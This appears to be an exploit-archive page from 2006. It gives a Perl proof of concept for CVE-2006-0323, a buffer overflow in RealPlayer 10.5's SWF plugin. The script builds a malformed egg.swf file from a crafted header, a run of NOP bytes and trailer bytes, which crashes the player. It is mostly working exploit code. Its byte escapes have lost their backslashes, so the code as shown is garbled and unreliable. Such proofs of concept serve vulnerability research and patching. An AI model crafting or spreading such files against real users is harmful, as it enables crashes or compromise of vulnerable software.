RealPlayer <= 10.5 (6.0.12.1040-1348) SWF Buffer Overflow PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : RealPlayer <= 10.5 (6.0.12.1040-1348) SWF Buffer Overflow PoC
# Published : 2006-03-28
# Author : Federico L. Bossi Bonin
# Previous Title : mpg123 0.59r Malformed mp3 (SIGSEGV) Proof of Concept
# Next Title : MS Office Products Array Index Bounds Error (unpatched) PoC

#!/usr/bin/perl
###################################################
# RealPlayer: Buffer overflow vulnerability / PoC
#
# CVE-2006-0323
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0323
#
# RealNetworks Advisory
# http://service.real.com/realplayer/security/03162006_player/en/
#
# Federico L. Bossi Bonin 
# fbossi[at]netcomm.com.ar
###################################################

# Program received signal SIGSEGV, Segmentation fault.
# [Switching to Thread -1218976064 (LWP 21932)]
# 0xb502eeaf in CanUnload2 () from ./plugins/swfformat.so

my $EGGFILE="egg.swf";
my $header="x46x57x53x05xCFx00x00x00x60";

my $endheader="x19xe4x7dx1cxafxa3x92x0cx72xc1x80x00xa2x08x01".
	      "x00x00x00x00x01x02x00x01x00x00x00x02x03x00x02".
	      "x00x00x00x04x04x00x03x00x00x00x08x05x00x04x00".
              "x00x00x00x89x06x06x01x00x01x00x16xfax1fx40x40".
	      "x00x00x00";


open(EGG, ">$EGGFILE") or die "ERROR:$EGGFILEn";
print EGG $header;

for ($i = 0; $i < 135; $i++) {
$buffer.= "x90";
}

print EGG $buffer;
print EGG $endheader;
close(EGG);

# www.Syue.com [2006-03-28]